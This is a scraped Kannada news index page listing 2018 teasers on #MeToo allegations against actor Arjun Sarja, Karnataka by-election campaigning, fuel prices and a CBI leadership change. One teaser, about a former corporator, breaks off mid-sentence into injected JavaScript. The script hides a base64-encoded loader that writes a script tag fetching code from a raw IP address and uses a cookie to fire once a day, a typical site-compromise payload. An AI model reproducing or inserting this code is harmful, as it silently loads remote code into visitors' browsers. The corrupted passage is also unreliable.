ಬೆಂಗಳೂರು: ತನ್ನ ಇ-ಮೇಲ್, ಫೇಸ್ಬುಕ್ ಹಾಗೂ ಟ್ವಿಟರ್ ಅಕೌಂಟ್ ಹ್ಯಾಕ್ ಆಗಿದೆ ಎಂದು ಬಹುಭಾಷಾ ನಟ ಅರ್ಜುನ್ ಸರ್ಜಾ ಪೊಲೀಸರಿಗೆ ದೂರು ನೀಡಿದ್ದಾರೆ. ಮೀ ಟೂ ಅಭಿಯಾನದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ನಟಿ ಶೃತಿ ಹರಿಹರನ್ ಅರ್ಜುನ್ ಸರ್ಜಾ ಅವರ ಮೇಲೆ ಲೈಂಗಿಕ ದೌರ್ಜನ್ಯ ಆರೋಪ ಮಾಡಿರುವ ಹೊತ್ತಲ್ಲೇ ಸರ್ಜಾ ಅವರ ಇ-ಮೇಲ್ ಹ್ಯಾಕ್ ಆಗಿರೋ ವಿಚಾರ ಬೆಳಕಿಗೆ ಬಂದಿದೆ. ಇ-ಮೇಲ್ ಹ್ಯಾಕ್ ಮಾಡಿ ನಾನಾ ಮೇಲ್ ಕಳಿಸಲಾಗ್ತಿದೆ ಎಂದು ಅರ್ಜುನ್ ಸರ್ಜಾ …
Read More »ಶೃತಿ ಹರಿಹರನ್ ವಿರುದ್ಧ ₹5 ಕೋಟಿ ಮಾನನಷ್ಟ ಕೇಸ್..
ಬೆಂಗಳೂರು: ಬಹುಭಾಷಾ ನಟ ಅರ್ಜುನ್ ಸರ್ಜಾ ವಿರುದ್ಧ ಮೀ ಟೂ ಆರೋಪ ಮಾಡಿರುವ ನಟಿ ಶೃತಿ ಹರಿಹರನ್ಗೆ ಇದೀಗ ಸಂಕಷ್ಟ ಎದುರಾಗಿದೆ. ಶೃತಿ ಹರಿಹರನ್ ವಿರುದ್ಧ ಅರ್ಜುನ್ ಸರ್ಜಾ ಮಾನನಷ್ಟ ಮೊಕದ್ದಮೆ ಹೂಡಲು ಮುಂದಾಗಿದ್ದಾರೆ. ₹5 ಕೋಟಿಗೆ ಮಾನನಷ್ಟ ಮೊಕದ್ದಮೆ ಹೂಡಲು ಸರ್ಜಾ ನಿರ್ಧರಿಸಿದ್ದಾರೆ. ಇಂದು ಸಂಜೆ ಸುದ್ದಿಗೋಷ್ಟಿಯ ಬಳಿಕ ಅರ್ಜುನ್ ಸರ್ಜಾ, ಧೃವ ಸರ್ಜಾ ಮೂಲಕ ಸಿವಿಲ್ ಕೋರ್ಟ್ನಲ್ಲಿ ಮಾನನಷ್ಟ ಮೊಕದ್ದಮೆ ಹೂಡಲಿದ್ದಾರೆ.
Read More »ಬಿಬಿಎಂಪಿಗೂ ಕಾಲಿಟ್ಟ.. #MeToo
ಬೆಂಗಳೂರು: ಚಂದವನದಲ್ಲಿ ಬಿರುಗಾಳಿ ಎಬ್ಬಿಸಿರುವ ಮೀ ಟೂ ಅಭಿಯಾನ ಬಿಬಿಎಂಪಿಗೂ ಕಾಲಿಟ್ಟಿದೆ. ಕೆಲಸದ ಜಾಗದಲ್ಲಿ ನಡೆಯುವ ಲೈಂಗಿಕ ಕಿರುಕುಳ ಅನುಭವವನ್ನು ಪೌರಕಾರ್ಮಿಕರು ತೆರೆದಿಟ್ಟಿದ್ದಾರೆ. ಈ ದೌರ್ಜನ್ಯಕ್ಕೆ ಕೊನೆ ಯಾವಾಗ ಎಂದು ಅಳಲು ತೋಡಿಕೊಂಡಿದ್ದಾರೆ. ಹೆಸರು ಹೇಳಲು ಇಚ್ಛಿಸದ ವ್ಯಕ್ತಿಯೊಬ್ಬರು, ಪೌರಕಾರ್ಮಿಕರಾಗಿ ಕೆಲಸ ಮಾಡುವ ತನ್ನ ಅತ್ತೆಗೆ ಪಾಲಿಕೆ ಅಧಿಕಾರಿಗಳಿಂದ ಆಗುತ್ತಿರುವ ಲೈಂಗಿಕ ಕಿರುಕುಳದ ಬಗ್ಗೆ ಫೇಸ್ ಬುಕ್ನಲ್ಲಿ ಬರೆದುಕೊಂಡಿದ್ದಾರೆ.ಬಡವರು ಪೌರಕಾರ್ಮಿಕ ಕೆಲಸಕ್ಕಾಗಿ ಬರುತ್ತಾರೆ. ನೀಚ ಅಧಿಕಾರಿಗಳು ಅವರಿಗೆ ಲೈಂಗಿಕ ಕಿರುಕುಳ …
Read More »ಮಂಡ್ಯ ಲೋಕಸಭಾ ಕ್ಷೇತ್ರ ಈಗಾಗಲೇ ನಾವು ಗೆದ್ದಿದ್ದೇವೆ- ವಿಪಕ್ಷ ನಾಯಕ ಯಡಿಯೂರಪ್ಪ ವಿಶ್ವಾಸ
ಜಮಖಂಡಿ ಅಭ್ಯರ್ಥಿ ಶ್ರೀಕಾಂತ ಕುಲಕರ್ಣಿ ಪರ ಪ್ರಚಾರಕ್ಕೆ ಹೊರಟಿದ್ದೇನೆ.ಬಳ್ಳಾರಿ, ಶಿವಮೊಗ್ಗ ಹಾಗೂ ಮಂಡ್ಯ ಲೋಕಸಭಾ ಕ್ಷೇತ್ರವನ್ನ ಈಗಾಗಲೇ ಗೆದ್ದಿದ್ದೇವೆ.ಹೆಚ್ಚು ಅಂತರದ ಗೆಲುವಿಗೆ ಪ್ರಯತ್ನ ನಡೆದಿದ್ದು,ಆರೋಪ, ಪ್ರತ್ಯಾರೋಪಗಳಿಗೆ ಜನ ಮುಂದಿನ ತಿಂಗಳು 6 ರಂದು ಉತ್ತರಿಸಲಿದ್ದಾರೆ.ಎಂದು ವಿಪ್ಷ ನಾಯಕ ಬಿಎಸ್ ಯಡಿಯೂರಪ್ಪ ಹುಬ್ಬಳ್ಳಿಯಲ್ಲಿ ಹೇಳಿದರು.ಮಂಡ್ಯ ಪ್ರಚಾರದ ವೇಳೆ ನಿರೀಕ್ಷೆಗೂ ಮೀರಿ ಜನ ಸೇರಿದ್ದರು.ಶ್ರೀರಾಮಲು 420 ಎಂದು ಸಿದ್ದರಾಮಯ್ಯ ಹೇಳಿದ ವಿಚಾರ.ಮಾಜಿ ಸಿಎಂ ಸಿದ್ದರಾಮಯ್ಯ ಪ್ರಚಾರದ ಭರಾಟೆಯಲ್ಲಿ ನಾಲಿಗೆ ಹರಿ ಬಿಟ್ಟಿದ್ದಾರೆ.ಈ ತರಹದ …
Read More »ಸತತ ಏಳನೇ ದಿನವೂ ಪೆಟ್ರೋಲ್-ಡಿಸೇಲ್ ಬೆಲೆಯಲ್ಲಿ ಇಳಿಕೆ
ನವದೆಹಲಿ: ಸತತ ಏಳನೇ ದಿನವೂ ಪೆಟ್ರೋಲ್-ಡಿಸೇಲ್ ಬೆಲೆಯಲ್ಲಿ ಇಳಿಕೆ ಕಂಡುಬಂದಿದ್ದು, ದೆಹಲಿಯಲ್ಲಿ ಪೆಟ್ರೋಲ್ 0.09 ಪೈಸೆ ಇಳಿಕೆಯಾಗಿದ್ದು, 81.25 ರೂ.ಗೆ ಇಳಿದಿದೆ. ಡೀಸೆಲ್ ಬೆಲೆ 74.85 ರೂ.ಗೆ ಕುಸಿದಿದೆ. ಸದ್ಯ ಮುಂಬೈಯಲ್ಲಿ ಪೆಟ್ರೋಲ್ ದರ ಲೀಟರ್ಗೆ 86.73 ಮತ್ತು ಡೀಸೆಲ್ಗೆ 78.46 ರೂ. ಹಬ್ಬದ ಋತುವಿನಲ್ಲಿ ಪೆಟ್ರೋಲ್ ಮತ್ತು ಡೀಸೆಲ್ಗಳ ಬೆಲೆ ಕುಸಿತದಿಂದಾಗಿ, ಸಾಮಾನ್ಯ ಜನರು ನಿಟ್ಟುಸಿರು ಬಿಡುವಂತಾಗಿದೆ.ಮಂಗಳವಾರ ಬೆಲೆ ಎಷ್ಟಿತ್ತು?ಮಂಗಳವಾರ, ದೆಹಲಿ ಮತ್ತು ಮುಂಬೈನಲ್ಲಿ ಪೆಟ್ರೋಲ್ ದರವನ್ನು ಪ್ರತಿ …
Read More »ಮೈಗೂರು, ಸಾವಳಗಿ ಪಂ.ವ್ಯಾಪ್ತಿಯ ಎಲ್ಲಾ ರಸ್ತೆಗಳಿಗೂ ಇನ್ನು 3 ತಿಂಗಳಲ್ಲಿ ಡಾಂಬರೀಕರಣ
ಜಮಖಂಡಿ: ಮೈಗೂರು ಹಾಗೂ ಸಾವಳಗಿ ಪಂಚಾಯತಿ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ಇನ್ನು ಮೂರು ತಿಂಗಳ ಒಳಗಾಗಿ ಎಲ್ಲ ರಸ್ತೆಗಳಿಗೂ ಡಾಂಬರೀಕರಣ ಮಾಡಿಕೊಡುವ ಜವಾಬ್ಧಾರಿ ನನ್ನದು ಎಂದು ಉಪಮುಖ್ಯಮಂತ್ರಿ ಡಾ.ಜಿ. ಪರಮೇಶ್ವರ್ ಆ ಭಾಗದ ಜನರಿಗೆ ಭರವಸೆ ನೀಡಿದರು.ಜಮಖಂಡಿ ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರದಲ್ಲಿ ಮಂಗಳವಾರ ಕೂಡ ವಿವಿಧ ಪ್ರಚಾರ ಸಭೆಗಳಲ್ಲಿ ಭಾಗವಹಿಸಿ ಮತಯಾಚನೆ ಮಾಡಿದರು.ಬಳಿಕ ಜನರನ್ನುದ್ದೇಶಿಸಿ ಮಾತನಾಡಿದ ಅವರು, ಈ ಭಾಗದಲ್ಲಿ ಸಿದ್ದು ನ್ಯಾಮಗೌಡರು ಸಾಕಷ್ಟು ಅಭಿವೃದ್ಧಿ ಕೆಲಸ ಮಾಡಿದ್ದಾರೆ. ಅವರ ಬಗ್ಗೆ ಇಡೀ ಕ್ಷೇತ್ರದಲ್ಲಿ …
Read More »CBI ಹಂಗಾಮಿ ಮುಖ್ಯಸ್ಥರಾಗಿ ಎಂ. ನಾಗೇಶ್ವರ್ ರಾವ್ ನೇಮಕ.
ನವದೆಹಲಿ: ಹಠಾತ್ ಬೆಳವಣಿಗೆಯೊಂದರಲ್ಲಿ ಕೇಂದ್ರ ಸರ್ಕಾರವು ಸಿಬಿಐ ನಿರ್ದೇಶಕ ಅಲೋಕ್ ವರ್ಮಾ ಹಾಗೂ ಸಂಸ್ಥೆಯ ಹಿರಿಯ ಅಧಿಕಾರಿ ರಾಕೇಶ್ ಅಸ್ತಾನಾ ಅವರನ್ನು ರಜೆಯಲ್ಲಿ ತೆರಳುವಂತೆ ಅದೇಶಿಸಿದೆ.ಮಂಗಳವಾರ ರಾತ್ರಿ ಸಂಪುಟದ ನೇಮಕಾತಿ ಸಮಿತಿಯ ವಿಶೇಷ ಸಭೆ ನಡೆಸಿದ ಪ್ರಧಾನ ಮಂತ್ರಿ ನರೇಂದ್ರ ಮೋದಿ ಅವರು ನಾಗೇಶ್ವರ್ ರಾವ್ ಅವರನ್ನು ಹುದ್ದೆಗೆ ನೇಮಕ ಮಾಡಿದ್ದಾರೆ.ಸಿಬಿಐನ ಇಬ್ಬರು ಮುಖ್ಯ ಅಧಿಕಾರಿಗಳ ಹಗ್ಗ-ಜಗ್ಗಾಟ ತೀವ್ರಗೊಂಡ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಇತಿಹಾದಲ್ಲೇ ಮೊದಲ ಬಾರಿಗೆ ಎನ್ನುವ ಹಾಗೆ ಅತ್ಯುನ್ನತಾ ತನಿಖಾ …
Read More »#MeToo ಬಿಜೆಪಿಯಲ್ಲಿ ಇತ್ತೆನೋ ಜೆಡಿಎಸ್ನಲ್ಲಿಲ್ಲ: ಶಾಸಕ ಡಿ.ಸಿ.ಗೌರಿಶಂಕರ್
ತುಮಕೂರು: ತುಮಕೂರು ಗ್ರಾಮಾಂತರ ಜೆಡಿಎಸ್ ಶಾಸಕ ಡಿ.ಸಿ.ಗೌರಿಶಂಕರ್ ಮೀ-ಟೂ ಬಾಂಬ್ ಸಿಡಿಸಿದ್ದಾರೆ. ತುಮಕೂರಿನಲ್ಲಿ ಮೀ-ಟೂ ಅಭಿಯಾನದ ಬಗ್ಗೆ ಪ್ರತಿಕ್ರಿಯಿಸಿದ ಅವರು, ರಾಜಕಾರಣದಲ್ಲಿ ಮೀ-ಟೂ ಇದ್ಯೋ ಗೊತ್ತಿಲ್ಲ. ನಮ್ಮ ಪಕ್ಷದಲ್ಲಿ ಅಂತವರು ಯಾರೂ ಇಲ್ಲ. ಆದ್ರೆ, ಬಿಜೆಪಿಯಲ್ಲಿ ಇತ್ತೆನೋ ನನಗೇ ಗೊತ್ತಿಲ್ಲ ಅಂದರು.ಇದೇ ವೇಳೆ ನಟ ಅರ್ಜುನ್ ಸರ್ಜಾ ವಿರುದ್ಧ ಶ್ರುತಿ ಹರಿಹರನ್ ಮಾಡಿರುವ ಆರೋಪದ ಕುರಿತು ಮಾತನಾಡಿದ ಅವರು, ನಟಿ ಶ್ರುತಿ ಹರಿಹರನ್ ಇಷ್ಟು ದಿನ ಸುಮ್ಮನಿದ್ದದ್ದು ಸರಿಯಲ್ಲ. ದೌರ್ಜನ್ಯ …
Read More »ಮಾಜಿ ಕಾರ್ಪೋರೇಟರ್ ನಾಗರಾಜ್ ವಿರುದ್ಧ ನಾದಿನಿಯಿಂದಲೇ #MeToo ಆರೋಪ..!
ಬೆಂಗಳೂರು: ಬೆಂಗಳೂರಿನ ಮಾಜಿ ಕಾರ್ಪೊರೇಟರ್ ನಾಗರಾಜ್ ವಿರುದ್ಧ #MeToo ಆರೋಪ ಕೇಳಿಬಂದಿದೆ. ನಾಗರಾಜ್ ವಿರುದ್ಧ ಆತನ ನಾದಿನಿಯೇ ಲೈಂಗಿಕ ಕಿರುಕುಳದ ಆರೋಪ ಮಾಡಿದ್ದಾರೆ. ಆಸ್ತಿ ವಿಚಾರವಾಗಿ ನನಗೆ ಹಾಗೂ ನನ್ನ ?okie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘
Read More »ಹೆಚ್ಡಿಕೆ ಖಡಕ್ ನಿರ್ಧಾರ: ರಾಜ್ಯದಲ್ಲಿ ಇನ್ಮುಂದೆ ಕನ್ನಡ ಕಡತಗಳಿಗಷ್ಟೇ ಸಹಿ
ಬೆಂಗಳೂರು: ಆಡಳಿತದಲ್ಲಿ ಕನ್ನಡ ಭಾಷೆ ಅನುಷ್ಠಾನ ಕುರಿತು ದಿಟ್ಟ ನಿರ್ಧಾರ ತೆಗೆದುಕೊಂಡಿರುವ ಮುಖ್ಯಮಂತ್ರಿ ಹೆಚ್.ಡಿ. ಕುಮಾರಸ್ವಾಮಿ ನೇತೃತ್ವದ ಸಮ್ಮಿಶ್ರ ಸರ್ಕಾರ, ನವೆಂಬರ್ 1 ರಿಂದ ಸರ್ಕಾರದ ಎಲ್ಲಾ ಕಡತಗಳಲ್ಲಿ ‘ಕನ್ನಡ ಬಳಕೆ ಕಡ್ಡಾಯ’ಕ್ಕೆ ಆದೇಶ ಹೊರಡಿಸಿದೆ.ನವೆಂಬರ್ 1ರ ಬಳಿಕ ರಾಜ್ಯ ಸರ್ಕಾರದ ಕಡತಗಳಲ್ಲಿ ಕನ್ನಡ ಅನುಸರಿಸದಿದ್ದರೆ ಅಂತಹ ಕಡತಗಳನ್ನು ಪರಿಶೀಲಿಸಲಾಗುವುದಿಲ್ಲ ಎಂದು ಖಡಕ್ ಸೂಚನೆ ನೀಡಲಾಗಿದೆ. ಕನ್ನಡ ರಾಜ್ಯೋತ್ಸವ ದಿನದಿಂದಲೇ ರಾಜ್ಯಸರ್ಕಾರದ ಕಡತಗಳು ಹಾಗೂ ಅಂತರ ರಾಜ್ಯ ವಿಷಯಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ …
Read More »
bigtvnews | Hubli Dharwad News | Kannada News | Karnataka News Hubli News | News In Hubli | Local news





